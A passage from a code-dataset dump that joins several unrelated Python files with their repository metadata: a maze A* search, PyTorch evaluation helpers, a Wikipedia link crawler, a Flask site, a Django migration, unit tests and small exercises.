heapq.heapify(frontier)
flag = 1
break
if flag:
continue
for visited_state in visited:
if visited_state[0] == reached_state[0] and visited_state[1] == reached_state[1]:
flag = 1
break
if flag:
continue
heapq.heappush(frontier, (new_f, reached_state))
prev[reached_state] = cur_state
def bfs_in_two(maze, node1, node2):
#Find a single point
obj = node1
start = node2
path = []
queue = []
visited = {}
queue.append(start)
visited[start] = None
while len(queue) != 0:
curPt = queue.pop(0)
if curPt == obj:
while curPt is not None:
path.insert(0, curPt)
curPt = visited[curPt]
return len(path)
break
for p in maze.getNeighbors(curPt[0], curPt[1]): # See neighbors
if p not in visited:
queue.append(p)
visited[p] = curPt
return len(path)
class dset:
def __init__(self):
self.upTree = {}
def addelement(self, node):
self.upTree[node] = -1
def find(self, node): # Return the root
if type(self.upTree[node]) == int and self.upTree[node] < 0:
return node
root = self.find(self.upTree[node])
self.upTree[node] = root # Path compression
return root
def setunion(self, a, b):
rootA = self.find(a)
rootB = self.find(b)
sizeA = self.upTree[rootA]
sizeB = self.upTree[rootB]
newSize = sizeA + sizeB
if sizeA <= sizeB:
self.upTree[rootB] = rootA
self.upTree[rootA] = newSize
else:
self.upTree[rootA] = rootB
self.upTree[rootB] = newSize
def size(self, elem):
root = self.find(elem)
return -1*self.upTree[root]
def Find_Mst(unvisited_obj, MST_table, Manhatten_table):
#Find MST using Kruskal's algorithm
if not unvisited_obj:
return 0
if frozenset(unvisited_obj) in MST_table:
return MST_table[frozenset(unvisited_obj)]
path_cost = PriorityQueue()
total_path_cost = 0
path_collection = []
node_set = dset()
#Build up the Priority queue and disjoint set
for i in range(len(unvisited_obj)):
node_set.addelement(unvisited_obj[i])
for j in range(i+1, len(unvisited_obj)):
dist = Manhatten_table[(unvisited_obj[i], unvisited_obj[j])]
path_cost.put((dist, (unvisited_obj[i], unvisited_obj[j])))
#Compute MST using customed disjoint set data structure
while node_set.size(unvisited_obj[0]) != len(unvisited_obj):
cur_path = path_cost.get()
node0 = list(cur_path[1])[0]
node1 = list(cur_path[1])[1]
if node_set.find(node0) == node_set.find(node1):
continue
node_set.setunion(node0, node1)
total_path_cost += cur_path[0]
path_collection.append(cur_path[1])
#Cache Value
#Cache total_path_cost
MST_table[frozenset(unvisited_obj)] = total_path_cost
return total_path_cost
def Compute_Manhatten(unvisited_obj, maze):
Manhatten_table = {}
#Find pairs of Manhatten distance
#Store them in a table for later use
for i in range(len(unvisited_obj)):
for j in range(len(unvisited_obj)):
if i != j:
Manhatten_table[(unvisited_obj[i], unvisited_obj[j])] = bfs_in_two(maze, unvisited_obj[i], unvisited_obj[j])
return Manhatten_table
def Heu_Multi(curNode, unvisited_obj, Manhatten_table, MST_table, maze):
#Find the heuristic for multi obj. problem
#Heuristic: Manhatten Distance to the nearest unvisited city + total length of MST of unvisited cities
#First, we find the MST total length
mst_length = Find_Mst(unvisited_obj, MST_table, Manhatten_table)
if not unvisited_obj:
near_dist = 0
else:
near_dist = min([bfs_in_two(maze, x, curNode) for x in unvisited_obj])
return mst_length + near_dist - 1
def astar_multi(maze):
frontier = []
visited = []
prev = {}
objs = tuple(maze.getObjectives())
start = maze.getStart()
MST_table = {}
Manhatten_table = Compute_Manhatten(list(objs), maze)
f_init = Heu_Multi(start, list(objs), Manhatten_table, MST_table, maze)
initState = (start, objs, 0)
heapq.heappush(frontier, (f_init, initState))
prev[initState] = None
while True:
cur_state = heapq.heappop(frontier)[1]
cur_node = cur_state[0]
cur_objs = cur_state[1]
#print(len(cur_objs))
cur_g = cur_state[2]
if len(list(cur_objs)) == 0:
path = []
ite = cur_state
while ite is not None:
path.insert(0, ite[0])
ite = prev[ite]
return path
visited.append(cur_state)
for node in maze.getNeighbors(cur_node[0], cur_node[1]):
new_g = cur_g + 1
new_objs = cur_objs[:]
if node in cur_objs:
listx = list(new_objs)
listx.remove(node)
new_objs = tuple(listx)
reached_state = (node, new_objs, new_g)
new_f = new_g + Heu_Multi(node, new_objs,Manhatten_table,MST_table,maze)
flag = 0
for i in range(len(frontier)):
to_state = frontier[i][1]
if to_state[0] == node and to_state[1] == new_objs:
if new_g < to_state[2]:
frontier[i] = (new_f, reached_state)
prev[reached_state] = cur_state
heapq.heapify(frontier)
flag = 1
break
if flag:
continue
for visited_state in visited:
if visited_state[0] == reached_state[0] and visited_state[1] == reached_state[1]:
if visited_state[2] > reached_state[2]:
heapq.heappush(frontier, (new_f, reached_state))
visited.remove(visited_state)
prev[reached_state] = cur_state
flag = 1
break
if flag:
continue
heapq.heappush(frontier, (new_f, reached_state))
prev[reached_state] = cur_state
return
def extra(maze):
return
|
[
"xs15@illinois.edu"
] |
xs15@illinois.edu
|
|
010c9fb88bc98f634230f8508b1d8996b3358a35
|
4e2e7825256a61f8a7cfe9bf73ef954e81c0b443
|
/HW2/utils/postprocess.py
|
1c6ac18b3a85b5e903f19c6a0f29b65e5c89812e
|
[] |
no_license
|
jonahthelion/cs287-s18
|
1155666b4f90b88b28c3ada94cd4147b56573168
|
b7e9f876edfcf5e933f8c8077590afc72d1fb615
|
refs/heads/master
| 2021-05-08T20:35:39.686276
| 2018-12-02T01:30:52
| 2018-12-02T01:30:52
| 119,612,436
| 0
| 0
| null | 2018-01-31T00:31:18
| 2018-01-31T00:31:17
| null |
UTF-8
|
Python
| false
| false
| 2,447
|
py
|
import torch
import torch.nn.functional as F
import torchtext
from torch.autograd import Variable
import numpy as np
from tqdm import tqdm
def evaluate(model, test_iter):
    all_actuals = []
    all_preds = []
    for batch in tqdm(test_iter):
        all_preds.extend(model.predict(batch.text[:-1].cuda()).cpu())
        all_actuals.extend(batch.text[-1])
    all_actuals = torch.stack(all_actuals).squeeze()
    all_preds = torch.stack(all_preds)
    _,top_ranks = all_preds.data.topk(20,1)
    dotted = 1./torch.arange(1, 21)
    MAP = []
    for row_ix in range(len(all_actuals)):
        vals = (all_actuals[row_ix].data == top_ranks[row_ix]).float()
        MAP.append((vals * dotted).sum())
    return np.mean(MAP)

def write_submission(model, fout, TEXT):
    print("writing submission", fout)
    test = torchtext.datasets.LanguageModelingDataset(path="PSET/input.txt",text_field=TEXT)
    samples = [row.rstrip().split(" ") if row_ix == 0 else row.rstrip().split(" ")[1:] for row_ix,row in enumerate(' '.join(test[0].text).split('___ <eos>'))][:-1]
    samples = torch.stack([torch.Tensor([TEXT.vocab.stoi[ix] for ix in row]).long() for row in samples], 1)
    preds = model.predict ( Variable(samples).cuda() ).cpu()
    _,top_ranks = preds.data.topk(20,1)
    with open(fout, 'w') as writer:
        writer.write('id,word\n')
        for row_ix,row in enumerate(top_ranks):
            writer.write(str(row_ix+1) + ',')
            for counter,word_ix in enumerate(row):
                if counter != len(row) - 1:
                    writer.write(str(TEXT.vocab.itos[word_ix]) + ' ')
                else:
                    writer.write(str(TEXT.vocab.itos[word_ix]) + '\n')
    return samples, top_ranks

def vis_display(vis, vis_windows, x_coord, train_l, MAP):
    if vis_windows is None:
        vis_windows = {}
        vis_windows['train_ce'] = vis.line(Y=torch.Tensor([float(train_l)]), X=torch.Tensor([x_coord]), opts=dict(title='Train CE'))
        vis_windows['val_ce'] = vis.line(Y=torch.Tensor([float(MAP)]), X=torch.Tensor([x_coord]), opts=dict(title='Validation MAP'))
    else:
        vis.line(Y=torch.Tensor([float(train_l)]), X=torch.Tensor([x_coord]), win=vis_windows['train_ce'], update='append', opts=dict(title='Train CE'))
        vis.line(Y=torch.Tensor([float(MAP)]), X=torch.Tensor([x_coord]), win=vis_windows['val_ce'], update='append', opts=dict(title='Validation MAP'))
    return vis_windows
|
[
"jonahphilion@Jonahs-MacBook-Pro-4.local"
] |
jonahphilion@Jonahs-MacBook-Pro-4.local
|
e9d2229197117983d242e32952964303341a0ea9
|
31023b59e743b5bef1c2c935dc1f2b26e8e10e9b
|
/文件操作/file_5.py
|
3d47006044ce188324a2f2d6c38244e91fc3a632
|
[] |
no_license
|
hsyy673150343/PythonLearning
|
417650d8ab5dbafbede08ef40223b29e82738443
|
817c6bd4c2ecba2549fa0be9f0c41337fe5acfdf
|
refs/heads/master
| 2020-05-18T06:36:25.648709
| 2019-05-23T13:40:59
| 2019-05-23T13:40:59
| 184,239,403
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 235
|
py
|
#!/usr/bin/env python
# -*- coding:utf8 -*-
# @TIME : 11:20
# @Author : 洪松
# @File : file_5.py
'''
The with statement automatically closes the file when the block exits
'''
with open('小重山山','r',encoding='utf-8') as file:
    print(file.read())
|
[
"13096337080@163.com"
] |
13096337080@163.com
|
67bb96a5e1042e33591a00351fdc8554ba0f588e
|
3c7e0854faca88cd7b1b390323a81b3e6d8a902e
|
/blinkenlight.py
|
47c82bf2ab03ae55738d8b64085b88a4ee922fd7
|
[] |
no_license
|
penguin-grenade/Pinballcohol
|
0a67a7ac8e42c6107d7792a664eab067f547166f
|
3b98a00284b17002c8362815a87c99874bf25f08
|
refs/heads/master
| 2020-04-05T17:06:19.676851
| 2018-11-11T03:48:19
| 2018-11-11T03:48:19
| 157,044,765
| 0
| 0
| null | 2018-11-11T03:44:37
| 2018-11-11T03:44:37
| null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
import gpiozero as pi
from time import sleep
led = pi.LED(17)
while True:
    led.on()
    sleep(1)
    led.off()
    sleep(1)
|
[
"pseudoboss11@gmail.com"
] |
pseudoboss11@gmail.com
|
d27ded37cb89d6e428fab989e1fcbb4876d8735d
|
98cc7697985f78326b8065bce7955bef3c6f802c
|
/findPaths.py
|
806467b09e4eb9760f7edd0e1dbaa17ac49dadca
|
[] |
no_license
|
eswardhinak/WikipediaGame
|
86c19808678999d3f4efc30f096c1d21bc389251
|
393ec90ac92b6822ec673686ac0b5e105d840ced
|
refs/heads/master
| 2021-07-08T09:24:14.899386
| 2021-04-22T02:43:01
| 2021-04-22T02:43:01
| 31,444,976
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,648
|
py
|
'''
Name: findPaths
Description: This module does the searching for the end article using a BFS.
'''
import re
from lxml import html
import requests
from sets import Set
import Queue
import WikiNode
import time
import random
visited = Set([]) #set of visited articles
web = dict({}) #hashtable of visited WikiNodes
defList = []
'''
Name: findPaths(current_article, end_article)
current_article -- starting article
end_article -- destination article
Description: Breadth first search to find the destination article
'''
def findPaths(current_article, end_article):
global web
global defList
end_article_spaces = end_article
current_article = current_article.replace(' ', '_')
end_article = end_article.replace(' ', '_')
wiki_link_start = "http://en.wikipedia.org/wiki/" + current_article
page=requests.get(wiki_link_start)
tree=html.fromstring(page.text)
links=tree.xpath('//p//a/@href')
if (len(links) < 2):
links = tree.xpath('//a/@href')
list_of_words = end_article_spaces.split()
nonExistString = "Wikipedia does not have an article with this exact name."
for item in list_of_words:
currLink = "http://en.wikipedia.org/wiki/" + item
page = requests.get(currLink)
if (page.status_code >= 400): # drop words whose pages do not exist
list_of_words.remove(item)
start_art_wiki = "/wiki/" + current_article
global visited
visited.add(start_art_wiki)
end_art_wiki = "/wiki/" + end_article
textLinks = tree.xpath('//a/text()')
if end_article_spaces in textLinks:
print "Found."
return
if end_art_wiki in links:
print "Found."
return
wiki_link_end = "http://en.wikipedia.org" + end_art_wiki
page_end = requests.get(wiki_link_end)
tree_end = html.fromstring(page_end.text)
links_end = tree_end.xpath('//p//a/@href')
if (len(links_end)<2):
links_end = tree_end.xpath('//a/@href')
k = 0
m = 0
links_Queue = Queue.Queue()
for item in list_of_words:
addLink = "/wiki/" + item
defList.append(addLink)
while k < 2:
if (m < len(links_end)):
if (isValidLink(links_end[m])):
defList.append(links_end[m])
k=k+1
m=m+1
else:
m=m+1
else:
break
print "-----------------------------------"
print "This is what I know about " + end_article + ": "
for item in defList:
prstring = item + ", "
print prstring
print "-----------------------------------"
time.sleep(3)
i=0
j=0
count=0
for item in defList:
if item in links:
if (isValidLink(item)):
visited.add(item)
links_Queue.put(item)
currentNode = WikiNode.WikiNode(start_art_wiki, item)
web[item] = currentNode
count = count + 1
while i<2:
if (j<len(links)):
if (isValidLink(links[j])):
visited.add(links[j])
links_Queue.put(links[j])
currentNode = WikiNode.WikiNode(start_art_wiki, links[j])
web[links[j]] = currentNode
i=i+1
i=i+1
else:
j=j+1
else:
break
start = WikiNode.WikiNode("-1", start_art_wiki)
web[start_art_wiki] = start
BFS(links_Queue, end_article, end_article_spaces)
#breadth first search
def BFS(queue_links, end_article, end_article_spaces):
global visited
global web
global defList
end_article = "/wiki/" + end_article
while not queue_links.empty():
current_article = queue_links.get()
print current_article + " " + end_article
if (current_article == end_article):
print "Found."
return
else:
search_link = "http://en.wikipedia.org" + current_article
try:
page = requests.get(search_link)
except requests.ConnectionError:
continue
tree = html.fromstring(page.text)
allinks = tree.xpath('//a/@href')
links = tree.xpath('//p//a/@href')
textLinks = tree.xpath('//p//a/text()')
if end_article_spaces in textLinks:
print end_article_spaces
for item in textLinks:
print item
for item in allinks:
print item
'''f = open('final_article', 'w')
for item in textLinks:
f.write(item)
f.close()'''
print "Found."
print "_______"
printPath(end_article, current_article)
return
if end_article in links:
print end_article_spaces
for item in textLinks:
print item
for item in allinks:
print item
'''f = open('final_article', 'w')
for item in textLinks:
f.write(item)
f.close()'''
print "Found."
print "_______"
printPath(end_article, current_article)
return
i=0
j=0
count=0
for item in defList:
if item in links:
if (isValidLink(item)):
visited.add(item)
queue_links.put(item)
currentNode = WikiNode.WikiNode(current_article, item)
web[item] = currentNode
count = count + 1
while i<2:
#index = int(random.random() * len(links))
index = j
if (index <len(links)):
if (isValidLink(links[index])):
visited.add(links[index])
queue_links.put(links[index])
current = WikiNode.WikiNode(current_article, links[index])
web[links[index]] = current
i=i+1
j=j+1
else:
j=j+1
else:
break
#Function to use to get page in bad connection situations
def getPage(search_link):
try:
page = requests.get(search_link)
return page
except requests.ConnectionError:
time.sleep(1)
return getPage(search_link)
#function that uses WikiNodes to print the path taken once destination article is found
def printPath(end_article, article):
global web
currNode = web[article]
parent = currNode.parent
stack = []
stack.append(currNode)
while (parent != "-1"):
currNode = web[parent]
stack.append(currNode)
parent = currNode.parent
while (len(stack)!=0):
currNode = stack.pop()
print currNode.name
print " ---> "
print end_article
#function that checks if a given link is valid
def isValidLink(link):
global visited
search_link = "http://en.wikipedia.org" + link
if (link in visited):
return False
if (link[0]=='#'):
return False
if (link[:2]=='//'):
return False
link_without_wiki=link[6:]
if (link_without_wiki[:5] == 'Help:'):
return False
if (link_without_wiki[:5] == 'File:'):
return False
if (link[:5] == 'http:'):
return False
if ("%" in link):
return False
bad_strings = []
bad_strings.append("disambiguation")
bad_strings.append("Protection_policy")
bad_strings.append("Requests_for_page_protection")
bad_strings.append("Template_messages")
bad_strings.append("Editnotices")
bad_strings.append("Wikipedia:")
bad_strings.append("Template")
bad_strings.append("Free_content")
bad_strings.append("Logo_of_Wikipedia")
bad_strings.append("Content")
bad_strings.append("Portal")
bad_strings.append("Talk:")
bad_strings.append("index.php")
for bad in bad_strings:
if bad in link:
return False
return True
|
[
"edhinaka@ucsd.edu"
] |
edhinaka@ucsd.edu
|
77ef1479e8e71997ee5731680e282867e443c25f
|
fb40da02fbcb7ee3996a52315c945c81ab5d82a5
|
/main.py
|
5b2291fa59d8c243f8d2084a4a2ead120cec4498
|
[] |
no_license
|
mkaminsky11/LOLClub
|
47688fbb2ee542b1d6022ef98459a288e1a89364
|
37f0a913db85888ac37ddcfffeb163e735c83e7a
|
refs/heads/master
| 2021-01-12T11:46:51.751851
| 2016-09-19T03:33:46
| 2016-09-19T03:33:46
| 67,903,147
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 679
|
py
|
from flask import Flask, render_template, request
import json
app = Flask(__name__)
@app.route('/')
def index(user=None):
    return render_template('index.html')

@app.route('/people')
def people(user=None):
    f = open('people.json', 'r')
    json_raw = f.read()
    json_decoded = json.loads(json_raw)
    return render_template('people.html', people=json_decoded['people'])

@app.route('/events')
def events(user=None):
    return render_template('events.html')

@app.route('/contact')
def contact(user=None):
    return render_template('contact.html')

@app.route('/<path:path>')
def static_proxy(path):
    return app.send_static_file(path)

if __name__ == '__main__':
    app.run()
|
[
"mkaminsky11@gmail.com"
] |
mkaminsky11@gmail.com
|
e7bdbb7033d3ec8664635d8b99cde65cc7c7adce
|
8247d8a41b83318adb7dcb6180ec0d440f3de953
|
/98_validateBinarySearchTree/sol2.py
|
22404be25eb3c2de07cbec2e6a655cbe11110cf0
|
[] |
no_license
|
weichungw/meishiTackling
|
8009446beab388ff921da3ee7e6baf801e6aee21
|
d204fd293d811dd5d107bbc5cc0d921a4b8cfdf3
|
refs/heads/master
| 2021-09-07T21:23:16.739494
| 2018-03-01T09:13:12
| 2018-03-01T09:13:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 165
|
py
|
class TreeNode:
    def __init__(self,x):
        self.val=x
        self.left=None
        self.right=None

class Solution:
    def isValidBST(self, root):
|
[
"thecamelyouknow@gmail.com"
] |
thecamelyouknow@gmail.com
|
f6978f575bf64d88a52ba0b2a7be7931cc019f04
|
fa8a1d118fb311043df7ce31242002c63f555cc2
|
/lib/hook/__init__.py
|
96d71f754bf7fa79919a5570aec9c8ed8716f1d3
|
[
"MIT"
] |
permissive
|
kuro2a/kiku
|
9f48d7bf2e66d273a5adb88ab1ca1634ff2a92ee
|
d4e6500970a20d1955f1773e0e2cfb8e2db819ba
|
refs/heads/master
| 2022-11-16T23:12:23.198173
| 2020-06-25T15:32:06
| 2020-06-25T15:32:06
| 198,195,299
| 2
| 2
|
NOASSERTION
| 2020-06-25T15:32:07
| 2019-07-22T09:53:27
|
Python
|
UTF-8
|
Python
| false
| false
| 53
|
py
|
#!/usr/bin/python3
from lib.hook.validation import *
|
[
"redagma2+dev@gmail.com"
] |
redagma2+dev@gmail.com
|
de49719e99a274ae9898c2bddee78fa0a2aaf49d
|
593472fe5926ca8ee25bfdacc15302622a73c422
|
/tests/test_models/test_base_model.py
|
a03d9c227ac8132c6db2afa3823c051bd54a65f6
|
[
"LicenseRef-scancode-public-domain"
] |
permissive
|
oomsebas/AirBnB_clone
|
a25ecd6f3d68a79b9ca7ca413b0d9cb0d12562ac
|
fb58928de93ab741edb236ec2ea160ec6da678c0
|
refs/heads/main
| 2023-01-21T00:09:52.766043
| 2020-11-21T20:03:25
| 2020-11-21T20:03:25
| 308,455,479
| 0
| 1
| null | 2020-11-21T20:03:26
| 2020-10-29T21:36:17
|
Python
|
UTF-8
|
Python
| false
| false
| 5,638
|
py
|
#!/usr/bin/python3
"""
Unitest Class BaseModel
"""
import unittest
from models.base_model import BaseModel, __doc__ as mrdoc
import inspect
import models
from datetime import datetime as datetime
"""import pep8"""
class TestBaseModel(unittest.TestCase):
"""
Unitest for testing
"""
def test_module_docstring(self):
"""
Tests docstring for module
"""
self.assertTrue(len(mrdoc) > 20)
def test_class_docstring(self):
"""
Tests docstring for class
"""
self.assertTrue(len(BaseModel.__doc__) > 20)
def test_methods_docstring(self):
"""
Tests docstring for methods
"""
methods = inspect.getmembers(BaseModel, predicate=inspect.ismethod)
for name, func in methods:
self.assertTrue(len(func.__doc__) > 20)
def test_docstring_for_test(self):
"""
Tests docstring for this test
"""
self.assertTrue(len(__doc__) > 20)
def test_docstring_class_test(self):
"""
Tests dosctring for class TestBaseModel
"""
self.assertTrue(len(TestBaseModel.__doc__) > 20)
def test_docstring_methods(self):
"""
Tests docstring for all methods in TestBaseModel class
"""
methods = inspect.getmembers(TestBaseModel, predicate=inspect.ismethod)
for name, func in methods:
self.assertTrue(len(func.__doc__) > 20)
"""def test_pep8(self):
\"""
Tests for PEP-8
""\"
pep8style = pep8.StyleGuide(quiet=True)
result = pep8style.check_files(["models/base_model.py"])
self.assertEqual(result.total_errors, 0)"""
def test_base_init(self):
"""
Testing a class BaseModel
"""
instance = BaseModel()
self.assertIsInstance(instance, BaseModel)
self.assertTrue(issubclass(type(instance), BaseModel))
self.assertIs(type(instance), BaseModel)
instance.name = "Holberton"
instance.my_number = 89
self.assertEqual(instance.name, "Holberton")
self.assertEqual(instance.my_number, 89)
"""
at_class = {
"id": str,
"created_at": datetime
"updated_at": datetime
"name": str
"my_number": int
}
"""
def test_none(self):
"""Check if a new instance is not none"""
bm1 = BaseModel()
self.assertIsNotNone(bm1)
def test_uuid(self):
"""Check ids in the created instances"""
bm1 = BaseModel()
bm2 = BaseModel()
self.assertTrue(hasattr(bm1, "id"))
self.assertNotEqual(bm1.id, bm2.id)
def test_created_at(self):
"""Check if the instance has created_at Atttibute"""
bm1 = BaseModel()
bm2 = BaseModel()
self.assertTrue(bm1, "created_at")
self.assertTrue(bm2, "created_at")
def test_updated_at(self):
"""Check if the instance has created_at Atttibute"""
bm1 = BaseModel()
bm2 = BaseModel()
self.assertTrue(bm1, "updated_at")
self.assertTrue(bm2, "updated_at")
def test__str__(self):
"""Check the string of an created instance"""
bm1 = BaseModel()
printed = "[{}] ({}) {}".format(
bm1.__class__.__name__, bm1.id, bm1.__dict__)
self.assertEqual(str(bm1), printed)
def test_to_dict(self):
"""Test the to_dict method from BaseModel"""
bm1 = BaseModel()
bm1_dict = bm1.to_dict()
self.assertIsInstance(bm1_dict, dict)
self.assertEqual(bm1_dict["__class__"], "BaseModel")
self.assertEqual(str(bm1.id), bm1_dict["id"])
self.assertIsInstance(bm1_dict["created_at"], str)
self.assertIsInstance(bm1_dict["updated_at"], str)
def test_save(self):
"""Test to check each update in the storage"""
bm1 = BaseModel()
self.assertTrue(hasattr(bm1, "updated_at"))
bm1.save()
self.assertTrue(hasattr(bm1, "updated_at"))
t_arg = {'id': 'b6a6e15c-c67d-4312-9a75-9d084935e579',
'create_at': datetime(2017, 9, 28, 21, 5, 54, 119427),
'updated_at': datetime(2017, 9, 28, 21, 5, 54, 119572),
'name': 'bm1'}
bm2 = BaseModel(t_arg)
bm2.save()
last_time = bm2.updated_at
bm2.save()
self.assertNotEqual(last_time, bm2.updated_at)
def test_init_from_dict(self):
"""test to check a new instance witk Kwargs"""
my_dict = {'id': '56d43177-cc5f-4d6c-a0c1-e167f8c27337',
'created_at': '2017-09-28T21:03:54.052298',
'__class__': 'BaseModel', 'my_number': 89,
'updated_at': '2017-09-28T21:03:54.052302',
'name': 'Holberton'}
bm1 = BaseModel(**my_dict)
self.assertIsInstance(bm1, BaseModel)
self.assertIsInstance(bm1.id, str)
self.assertEqual(bm1.id, '56d43177-cc5f-4d6c-a0c1-e167f8c27337')
self.assertIsInstance(bm1.created_at, datetime)
self.assertIsInstance(bm1.updated_at, datetime)
self.assertIsInstance(bm1.name, str)
self.assertEqual(bm1.name, 'Holberton')
self.assertEqual(
bm1.created_at.isoformat(), '2017-09-28T21:03:54.052298')
self.assertEqual(
bm1.updated_at.isoformat(), '2017-09-28T21:03:54.052302')
def test_new_attributte(self):
"""test to check if new attribute can be added"""
bm1 = BaseModel()
bm1.name = "Betty"
self.assertEqual(bm1.name, "Betty")
|
[
"1843@holbertonschool.com"
] |
1843@holbertonschool.com
|
86b7a090def5e072694f4e756109666c1df9a149
|
be3ec8731040b7bafabdf7ca873ce3b3bdcd2e73
|
/partB.py
|
c332224ad26dbf9e3ee69f3c6d7730cec89e89aa
|
[] |
no_license
|
philipandreadis/InfoRetrivalProject
|
7a863f85e3c31f7f8aafc7b49b5795606f4d3cd9
|
0b7770e2a926597e0b4425df61587db9e3f74b71
|
refs/heads/master
| 2020-04-15T02:38:00.473075
| 2019-02-10T17:48:12
| 2019-02-10T17:48:12
| 164,321,244
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,309
|
py
|
from partA import binaryVector
import csv
import math
from collections import Counter
import numpy
th = 0.8 # threshold for most similar pairs
m = 100 # number of pairs to be tested
# Defines pairs with similarity over a threshold
# Returns a list with the most common pairs
def mostCommon(model,th):
    threshold = th
    commonPairs = []
    for i in range(1,len(lines)):
        if lines[i][model]>=threshold:
            commonPairs.append(lines[i])
    return commonPairs

lines = []
# Csv file processing
with open("train_original.csv", encoding="utf8") as f:
    reader = csv.reader(f, delimiter=",")
    c = 0
    for i, line in enumerate(reader):
        lines.append(line)
        if i > m:
            break

# Lines iteration
for i in range(1,len(lines)):
    s1 = lines[i][3]
    s2 = lines[i][4]
    #string preprocessing
    s1 = s1.lower()
    s2 = s2.lower()
    s1 = s1.strip('?')
    s2 = s2.strip('?')
    # Calculate binary similarity
    bsim = binaryVector(s1, s2)
    lines[i].append(bsim)

cpairs = mostCommon(6, th)
print("Pair of questions with similarity probability over {}:\n".format(th))
for i in range(len(cpairs)):
    print("id:{} \n question1: {} \n question2: {} \n binary vector sim probability: {}\n".format(cpairs[i][0],cpairs[i][3],cpairs[i][4],cpairs[i][6]))
|
[
"filipposa@csd.auth.gr"
] |
filipposa@csd.auth.gr
|
416e9f7365cafcf893ebd9b1b3af65e9a7ac351e
|
8244cba1e34d8d2f7acfa414828b709a0d62c3a1
|
/extra_apps/django_celery_results/migrations/0004_auto_20181127_0928.py
|
1b4ee91d58d0c49aa7584b11c0a140c7cec08d9e
|
[] |
no_license
|
nightqiuhua/ScraperManager
|
96fd21bc0b8442a76fcc615e66505b93591fcce8
|
b037e6347eda64df05d0a1496bae4fb3124d6ff4
|
refs/heads/master
| 2020-08-18T05:50:15.484878
| 2018-11-29T09:37:02
| 2018-11-29T09:37:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 505
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-11-27 01:28
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    dependencies = [
        ('django_celery_results', '0003_auto_20181106_1101'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='taskresult',
            options={'ordering': ['-date_done'], 'verbose_name': '任务结果', 'verbose_name_plural': '任务结果'},
        ),
    ]
|
[
"157571283@163.com"
] |
157571283@163.com
|
c2717850684ae720aca6cea890c073ce1c71dc45
|
2c3e6390fd02d888720f6a01679e63e0603ba128
|
/Python/Algorithms/Strings/Sherlock_and_the_Valid_String/solution.py
|
70860cfc4d6e9c6696fbc56fdbd1b66608b7d7ef
|
[] |
no_license
|
dileepmenon/HackerRank
|
ab39a7a6e40308a09bb7c3f644e4c8c1883a493c
|
07e4627e5507561f82df055b925a19833d88d258
|
refs/heads/master
| 2021-01-11T17:51:34.323145
| 2019-01-21T12:02:11
| 2019-01-21T12:02:11
| 79,847,239
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 710
|
py
|
#!/bin/python3
import sys
def isValid(s):
    alpha_coun = []
    for i in set(s):
        alpha_coun.append(s.count(i))
    a = list(set(alpha_coun))
    if len(a) > 2:
        return 'NO'
    else:
        if len(a) == 2:
            a1_coun = alpha_coun.count(a[0])
            a2_coun = alpha_coun.count(a[1])
            if a1_coun == 1 or a2_coun == 1:
                if abs(a[1] - a[0]) == 1:
                    return 'YES'
                elif a[0] == 1 or a[1] == 1:
                    return 'YES'
                else:
                    return 'NO'
            else:
                return 'NO'
        else:
            return 'YES'
s = input().strip()
result = isValid(s)
print(result)
|
[
"dileepmenon92@yahoo.com"
] |
dileepmenon92@yahoo.com
|
f20c06591cf4e72459e41d04268c3ab6d0ea7fc7
|
87876df58b20026cb79607c6ef40fc3b51928cd1
|
/contact/views.py
|
25ebc44774d32ff2b5c919c713f8d06d7a8f37f8
|
[] |
no_license
|
howa3204/kanaboard-app
|
7c530adfdda49b0ecf82b533ee47935666e28251
|
07383714b02c9bfa767c69240c98e5fcfd59751a
|
refs/heads/main
| 2023-08-19T10:27:11.835488
| 2021-09-22T06:53:07
| 2021-09-22T06:53:07
| 371,836,182
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,170
|
py
|
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.core.mail import EmailMessage
from django.shortcuts import render
# Create your views here.
@login_required(login_url='authentication:login')
def contact(request):
    if request.method == "POST":
        subject = request.POST['subject']
        body = request.POST['body']
        from_email = ['support@kanaboard.com']
        reply_to = request.POST['reply_to']
        context = {'subject':subject,
                   'body':body,
                   'reply_to':reply_to,
                   }
        email = EmailMessage(
            subject=subject,
            body=body,
            from_email='support@kanaboard.com',
            to=['support@kanaboard.com'],
            reply_to=[reply_to],
            headers={'username': request.user.username},
        )
        email.send(fail_silently=False)
        messages.success(request, "Message recieved! We'll get back to you shortly.")
        return render(request, 'contact/contact.html', context)
    else:
        context = {}
        return render(request, 'contact/contact.html', context)
|
[
"jordan@kanaboard.com"
] |
jordan@kanaboard.com
|
00b1230c16298db372c1cec1696b6a7c7f0b3d28
|
77f65ea86ebc544c3f3e66c0152086e45669068c
|
/ch03-lists-tuples/e12b2_popular_shells.py
|
28857e7cfb335dd083ca73655a30cbaa88837470
|
[] |
no_license
|
Cptgreenjeans/python-workout
|
e403f48b0694ff4db32fe5fc3f87f02f48a1a68e
|
b9c68520d572bf70eff8e554a8ee9c8702c88e6e
|
refs/heads/master
| 2023-07-16T21:49:14.198660
| 2021-08-29T13:49:12
| 2021-08-29T13:49:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 445
|
py
|
#!/usr/bin/env python3
"""Solution to chapter 3, exercise 12, beyond 2: shells_by_popularity"""
from collections import Counter
import operator
def shells_by_popularity(filename):
    shells = Counter(one_line.split(':')[-1].strip()
                     for one_line in open(filename)
                     if not one_line.startswith(('#', '\n')))
    return sorted(shells.items(),
                  key=operator.itemgetter(1), reverse=True)
|
[
"reuven@lerner.co.il"
] |
reuven@lerner.co.il
|
e7e6fd6c76c5449391e9213cb9992619f91deada
|
84721ed008c94f2c7351c63a6dd23d4107efcce0
|
/vimlite/VimLite/CxxParser.py
|
c6368a94d50ec070d3f1e558ff5391212fcd1900
|
[] |
no_license
|
vim-scripts/VimLite
|
